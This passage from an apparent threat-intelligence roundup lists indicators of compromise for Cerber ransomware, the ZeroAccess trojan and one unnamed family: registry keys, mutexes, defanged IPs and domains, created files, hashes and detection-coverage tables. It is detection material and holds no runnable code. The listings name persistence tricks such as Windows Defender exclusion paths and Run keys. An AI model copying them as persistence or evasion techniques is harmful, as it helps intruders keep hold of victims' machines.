PANEL\\BUSES \nValue Name: Config0 ` | 2 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\IAM \nValue Name: Server ID ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\kdrxwekz ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\KDRXWEKZ \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\KDRXWEKZ \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\KDRXWEKZ \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\KDRXWEKZ \nValue Name: DisplayName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\KDRXWEKZ \nValue Name: WOW64 ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\KDRXWEKZ \nValue Name: ObjectName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\KDRXWEKZ \nValue Name: Description ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\piwcbjpe ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\PIWCBJPE \nValue Name: Type ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\PIWCBJPE \nValue Name: Start ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\PIWCBJPE \nValue Name: ErrorControl ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\PIWCBJPE \nValue Name: DisplayName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\PIWCBJPE \nValue Name: WOW64 ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\PIWCBJPE \nValue Name: ObjectName ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\PIWCBJPE \nValue Name: Description ` | 1 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 1 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: apiMPQEC ` | 1 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 1 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\PIWCBJPE ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\syncronize_URN0LVA` | 2 \n`Global\\syncronize_URN0LVU` | 2 \n`A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A` | 1 \n`Global\\9776ba01-1ac7-11ea-a007-00501e3ae7b5` | 1 \n`Global\\990ba241-1ac7-11ea-a007-00501e3ae7b5` | 1 \n`Global\\95700cc1-1ac7-11ea-a007-00501e3ae7b5` | 1 \n`{<random GUID>}` | 1 \n`Local\\{<random GUID>}` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`69[.]55[.]5[.]250` | 2 \n`13[.]107[.]21[.]200` | 2 \n`43[.]231[.]4[.]7` | 2 \n`104[.]47[.]54[.]36` | 2 \n`172[.]217[.]7[.]164` | 2 \n`85[.]114[.]134[.]88` | 2 \n`172[.]217[.]12[.]164/31` | 2 \n`68[.]178[.]213[.]37` | 1 \n`94[.]100[.]180[.]104` | 1 \n`93[.]158[.]134[.]89` | 1 \n`81[.]19[.]78[.]66` | 1 \n`77[.]88[.]21[.]89` | 1 \n`46[.]4[.]52[.]109` | 1 \n`96[.]114[.]157[.]80` | 1 \n`94[.]100[.]180[.]31` | 1 \n`94[.]100[.]180[.]180` | 1 \n`104[.]47[.]9[.]33` | 1 \n`104[.]47[.]36[.]33` | 1 \n`213[.]209[.]1[.]129` | 1 \n`87[.]250[.]250[.]89` | 1 \n`211[.]231[.]108[.]46` | 1 \n`104[.]47[.]5[.]33` | 1 \n`213[.]180[.]147[.]146` | 1 \n`212[.]227[.]15[.]41` | 1 \n`208[.]89[.]132[.]199` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 2 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 2 \n`smtp[.]secureserver[.]net` | 1 \n`mx[.]yandex[.]ru` | 1 \n`yandex[.]ru` | 1 \n`list[.]ru` | 1 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 1 \n`mxs[.]mail[.]ru` | 1 \n`rambler[.]ru` | 1 \n`smtp-in[.]libero[.]it` | 1 \n`mx1[.]comcast[.]net` | 1 \n`libero[.]it` | 1 \n`mail[.]ru` | 1 \n`comcast[.]net` | 1 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 1 \n`mx[.]yandex[.]net` | 1 \n`inbox[.]ru` | 1 \n`eur[.]olc[.]protection[.]outlook[.]com` | 1 \n`aol[.]com` | 1 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 1 \n`emx[.]mail[.]ru` | 1 \n`yahoo[.]it` | 1 \n`mx[.]poczta[.]onet[.]pl` | 1 \n`charter[.]net` | 1 \n`inmx[.]rambler[.]ru` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\D47F.tmp` | 5 \n`%TEMP%\\CC4F.tmp` | 3 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\desktop.ini.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\FilterTransforms\\1033\\StarterKitsFilterTransform80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\CSharpLangFilter20.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\ControlsTopicTypeFilter80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\HelpTopicsTopicTypeFilter80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\InfoPathTechFilter12.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\KBTopicTypeFilter80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\NetFxTechFilter20.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\SamplesTopicTypeFilter80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\ServerEntTechFilter20.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\SnippetsTopicTypeFilter80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\StarterKitsTopicTypeFilter80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\VBLangFilter80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\VBScriptLangFilter80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\VS2005TechFilter80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\Win32TechFilter80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\WinFormsTechFilter20.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\WindowsTechLonghornWinFx60.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Filters\\1033\\XmlLangFilter80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%CommonProgramFiles(x86)%\\microsoft shared\\VS Help Data\\8.0\\Pages\\1033\\VSTAHowDoI80.xml.id-98B68E3C.[admin@sectex.net].bot` | 2 \n`%APPDATA%\\Microsoft\\Internet Explorer\\brndlog.bak.id-3C28B0E4.[admin@sectex.net].bot` | 2 \n`%APPDATA%\\Microsoft\\Internet Explorer\\brndlog.txt.id-3C28B0E4.[admin@sectex.net].bot` | 2 \n`%HOMEPATH%\\Cookies\\index.dat.id-3C28B0E4.[admin@sectex.net].bot` | 2 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 1a2997b0927ee1931765cf9b971ee5fd20ca9509f25eed7f2ece2f9b39ec30ec 1b7f2a5950d2d2c9f012c8aa7bb8a7611a19bea54e2ad3a11aaeeb178de91229 45e58500cc320316f3ab9cb9f9bde14446ae10f5ac37c93061b2bfad97b1026d 51fb27ab74d127a6cef6b1aaf416bc28020c93cc62926c25a0aabd64eadd51f0 63bbfc542016858d070ae21bc75f4f507273343ed7552b0fb1041b353891c943 6ac190612aeca2cf29bc2c403afd7ff4f6bd0978611b9879feed907a43d7a44e 7a6ca98d05b91859a323aeb8aa95cea2465223095963a56edd053ea2144d2949 8bd815aac414de71c6c9e8d98af6f3ea99f8f7d9eb99b24bd65aefc6fae62564 9adc16c0e94ecca0bd3bfb7a6913bc439fbeb59ae70ec264b49dc74bf92de628 a3397387c72d6215fbe3d976c0d2a2a96ada6526a1e939326e0a009c1469c748 ac1195f32c230290268c6ac144d386aaa1be9889ed4ba899bbd2078d1985a296 c909a47cc3169954c962a7bba2911694345cca7ecbe809a8e9ae737df9ee1c24 d59f8aa651ab5015619a62efde293097facdabd1a11c019cc0a0748009628126 f05b7128fd81fb67061ede7c279807ab347505762245f77f1ab0180bb4655cb2 fccdacfaf67834441250a0713534ef2d1047e7af6424a09df88a6ee132a3fe86 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-lLumGYy6obg/XfPGnGuw-vI/AAAAAAAADBA/F0Mtq3RJqPM8-hM7jC_fbChBxRWQ0gFwwCLcBGAsYHQ/s1600/c909a47cc3169954c962a7bba2911694345cca7ecbe809a8e9ae737df9ee1c24_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-xZPFQJX9reI/XfPGrS-SVnI/AAAAAAAADBE/tXTDX1g6xWsDxIOWA4TO9ZwMf28xQknZQCLcBGAsYHQ/s1600/c909a47cc3169954c962a7bba2911694345cca7ecbe809a8e9ae737df9ee1c24_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-7Ecb-AiNGZo/XfPGwU_r2jI/AAAAAAAADBI/vQfueWZEOy82A_SnUMbt_KWbm-JCe_0gACLcBGAsYHQ/s1600/c909a47cc3169954c962a7bba2911694345cca7ecbe809a8e9ae737df9ee1c24_umbrella.png>)\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7432369-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES \nValue Name: DefaultTokenId ` | 33 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\SPEECH\\VOICES ` | 33 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 32 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 31 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\DIRECT3D \nValue Name: Name ` | 1 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 33 \n`Local\\MidiMapper_modLongMessage_RefCnt` | 33 \n`shell.{<random GUID>}` | 27 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`91[.]119[.]216[.]0/27` | 33 \n`91[.]120[.]216[.]0/27` | 33 \n`91[.]121[.]216[.]0/25` | 33 \n`150[.]109[.]231[.]116` | 22 \n`54[.]209[.]0[.]191` | 18 \n`34[.]193[.]185[.]171` | 15 \n`178[.]128[.]255[.]179` | 11 \n`104[.]24[.]105[.]254` | 7 \n`104[.]24[.]104[.]254` | 4 \n`54[.]87[.]5[.]88` | 2 \n`52[.]21[.]132[.]24` | 1 \n`104[.]16[.]150[.]172` | 1 \n`104[.]16[.]149[.]172` | 1 \n`104[.]16[.]152[.]172` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]blockcypher[.]com` | 33 \n`bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com` | 25 \n`hjhqmbxyinislkkt[.]1j9r76[.]top` | 22 \n`bitaps[.]com` | 11 \n`chain[.]so` | 11 \n`btc[.]blockr[.]io` | 11 \n`hjhqmbxyinislkkt[.]1a8u1r[.]top` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\d19ab989` | 33 \n`%TEMP%\\d19ab989\\4710.tmp` | 33 \n`%TEMP%\\d19ab989\\a35f.tmp` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\03809a07-348b-48cc-b08d-f7b8472c133c.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\07a5080e-becd-4719-9a79-fe50b59eb55b.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\0d984a6a-e70e-4747-bded-b92173e85c21.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\0ec91619-5478-4e5c-aa1b-8da00a066091.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\115556d6-ba8b-4b18-8439-8e9c81ff63a4.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\1e81fb27-0aa3-4b11-a764-0d9e7e3272ea.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\3c6a9801-329c-4eba-9524-2165ac426bef.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\52c39d7c-6d6b-4ad3-b5e5-c417949d335d.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\5318eba9-773d-4fec-9366-6e84f8dfbbc5.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\5394c05d-dc33-4d24-bd45-2d8954648f28.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\62e3dfa2-4350-445b-8693-d1d04a74543c.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\6a8b0e06-e9a5-4761-afda-29391149e64d.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\70c3a864-35fa-4245-802a-dbda1e3f4c00.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\70d1f452-966e-4e28-8da5-8b2eeadbe078.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\7b168dd1-e39e-4b39-918c-53b9e78365e9.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\7dceec06-0991-43f4-8af3-601c0ebeb910.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\8339d228-5ca6-486f-8793-633aa6af18d8.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\a4fbc2bf-8cc2-4a6d-b3c7-0ef749399e7f.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\a507cd65-0038-49e4-8cdb-b6082f566351.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\a6f0f9a9-e50d-4612-9e8e-f5640793680c.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\a9e6bb3f-0b62-4410-86f7-68bb36989df7.png` | 33 \n`%LOCALAPPDATA%\\microsoft\\onenote\\14.0\\onenoteofflinecache_files\\b1503304-9b12-4d90-89e7-df30e304e6c2.png` | 33 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 00d8580b7de2d5cfcdeb6d896153cb43aeb8086ad87c320a20528fb0ab382c83 0156cd32b9647dcd19ef44503aa99dfcfb891365a6a1e0a4f364e1b882563a77 049e95486dc15591857897db7e038204ad7669afc52f6e413ad8eef6a042a3f3 0543292cf63218e40d9785a1e6e0b9cc0dddd34cd6cfdbd6e6735e7b2cd7767e 05e6572e963ec98373c94748dba580a9d4c99ced95d2c4e455cf2e952973404c 06d5ae8d97a7b3bb50330f566130ce3b0ceced3a9b92ff1b5be9b2a3b08dec89 09e5adc6762e13f50bbc4b3e233c00c44c77cab958bd3e30212034fe0a2471be 0af56173b6a8d920e8f42c564d590373d8a8c55edda2476deff5013a39d76d87 0cfb5e263ca7a4f5b38cd79c111eeeb7cb6e2e3150fc07996fd7b74a739452e8 0dccb9d4f1369026b350c848d98e0aadddd063ed231c9682419735b25d4cd1e0 0e2f515b821c6995dff04862e4808609e3ebfcb7dbf4cbd2884dc3b737657580 15f59c6041fbb1a8f54e083a4f501076efa61941f5064db404c2914be4973e2f 16f2a805ea445edf5c9cdab4d530235204acccaa50cda907dbb84177f71eda57 179ecfd3969f0f2aef94a99467064e60ef737bac9819439bcbe1b3ca2dffee08 183bad8c045acadaa5cdd8542fae8f05539249c0df2448816b3895a6d949caf3 1860ec3f04583312079795ca661360e723092217e0880ddc7e48345829f571a8 19e65785549059911db9ad54bbdbb8c4f86d6a4cc6710d8572b81afed213250b 1d44d8a762ee2f1f9813482b862428add0c081fab9bb27a4bad082a118b5e509 20122bc23fc55bbc44a920e8b9c06829a13e78258356798a64c224a534e06faf 2070face5382b738dda8e2a42c56b233793a9751fb6722e970d77da207d52f1f 20842d1ad99423e0412187f7f365ce5b9d93c2499df5bcb9da16a8d196b3e94c 244820be643b64929d14af90218aa67f2e9b2cb07d8654c5ead2d60a25f8ead3 2c670078bda065d704ed155173fc59438a15e71244c0f47ccf95d12225e27eaa 2f29ed32c90581269668e03216169207478721f2b9d59ebfb389a647c6a1f51a 2f3bf21023544bc5ade37a16588cf51aa6ac8327685de3953f44de57a3068a8d `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-FKD3xNphXyw/XfPHB4peJTI/AAAAAAAADBY/O27cZnEhRiIlUlEn0t-C4T0zBNzkwwZVACLcBGAsYHQ/s1600/3344465d6f6063081745f1f86273c4d8570bdaa27a96c3619c06d70174032880_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-7LRsKDSrUjQ/XfPHG69fv6I/AAAAAAAADBc/NJpWQgghdFUBkquO60qKM6hXX6fOEpCLQCLcBGAsYHQ/s1600/5128a5785b45cfe33d617a9c8c3d9a6833a829ee7857d3f567a7fc47d5a19378_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-wkfYkpl4MTw/XfPHMJzh4tI/AAAAAAAADBg/-_UncTzRcIkIfELhcS4ckaaQXA7XNh_4ACLcBGAsYHQ/s1600/c2374bc4c53b8397db4a6d6bf387629c61e45c65e502ca083053dc14af74360b_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-mMet90hymV8/XfPHSNGplpI/AAAAAAAADBo/QY4rZ16zOAk__RwdacNa24H5EN0IFlY_gCLcBGAsYHQ/s1600/20842d1ad99423e0412187f7f365ce5b9d93c2499df5bcb9da16a8d196b3e94c_malware.png>)\n\n \n\n\n* * *\n\n### Win.Trojan.ZeroAccess-7432508-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Start ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: DeleteFlag ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: DeleteFlag ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: DeleteFlag ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BROWSER \nValue Name: Start ` | 31 \n`<HKCR>\\CLSID\\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\\INPROCSERVER32 \nValue Name: ThreadingModel ` | 31 \n`<HKCR>\\CLSID\\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\\INPROCSERVER32 ` | 31 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 31 \n`<HKLM>\\SOFTWARE\\CLASSES\\CLSID\\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\\INPROCSERVER32 ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Type ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: ErrorControl ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: Type ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: ErrorControl ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\IPHLPSVC \nValue Name: DeleteFlag ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Type ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: ErrorControl ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: Type ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: ErrorControl ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000010 \nValue Name: PackedCatalogItem ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009 \nValue Name: PackedCatalogItem ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008 \nValue Name: PackedCatalogItem ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007 \nValue Name: PackedCatalogItem ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006 \nValue Name: PackedCatalogItem ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005 \nValue Name: PackedCatalogItem ` | 31 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004 \nValue Name: PackedCatalogItem ` | 31 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`68[.]58[.]140[.]128` | 38 \n`180[.]254[.]253[.]254` | 31 \n`166[.]254[.]253[.]254` | 31 \n`135[.]254[.]253[.]254` | 31 \n`117[.]254[.]253[.]254` | 31 \n`119[.]254[.]253[.]254` | 31 \n`134[.]254[.]253[.]254` | 31 \n`206[.]254[.]253[.]254` | 31 \n`222[.]254[.]253[.]254` | 31 \n`182[.]254[.]253[.]254` | 31 \n`190[.]254[.]253[.]254` | 31 \n`184[.]254[.]253[.]254` | 31 \n`197[.]254[.]253[.]254` | 31 \n`183[.]254[.]253[.]254` | 31 \n`158[.]254[.]253[.]254` | 31 \n`204[.]254[.]253[.]254` | 31 \n`24[.]149[.]4[.]58` | 29 \n`97[.]95[.]231[.]238` | 28 \n`50[.]68[.]78[.]41` | 26 \n`188[.]26[.]185[.]40` | 26 \n`111[.]250[.]107[.]91` | 26 \n`173[.]175[.]25[.]91` | 26 \n`184[.]166[.]16[.]43` | 26 \n`24[.]98[.]179[.]133` | 26 \n`79[.]115[.]11[.]4` | 26 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`j[.]maxmind[.]com` | 31 \nFiles and or directories created | Occurrences \n---|--- \n`\\RECYCLER\\S-1-5-18\\$ad714f5b8798518b3ccb73fd900fd2ba\\@` | 38 \n`\\RECYCLER\\S-1-5-18\\$ad714f5b8798518b3ccb73fd900fd2ba\\n` | 38 \n`\\RECYCLER\\S-1-5-21-1258710499-2222286471-4214075941-500\\$ad714f5b8798518b3ccb73fd900fd2ba\\@` | 38 \n`\\RECYCLER\\S-1-5-21-1258710499-2222286471-4214075941-500\\$ad714f5b8798518b3ccb73fd900fd2ba\\n` | 38 \n`%SystemRoot%\\assembly\\GAC\\Desktop.ini` | 38 \n`\\systemroot\\assembly\\GAC_32\\Desktop.ini` | 31 \n`\\systemroot\\assembly\\GAC_64\\Desktop.ini` | 31 \n`%System32%\\LogFiles\\Scm\\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 31 \n`%SystemRoot%\\assembly\\GAC_32\\Desktop.ini` | 31 \n`%SystemRoot%\\assembly\\GAC_64\\Desktop.ini` | 31 \n`\\$Recycle.Bin\\S-1-5-18` | 31 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f` | 31 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\@` | 31 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\L` | 31 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\U` | 31 \n`\\$Recycle.Bin\\S-1-5-18\\$0f210b532df043a6b654d5b43088f74f\\n` | 31 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f` | 31 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\@` | 31 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\L` | 31 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\U` | 31 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\$0f210b532df043a6b654d5b43088f74f\\n` | 31 \n`%ProgramFiles%\\Windows Defender\\MSASCui.exe:!` | 31 \n`%ProgramFiles%\\Windows Defender\\MpAsDesc.dll:!` | 31 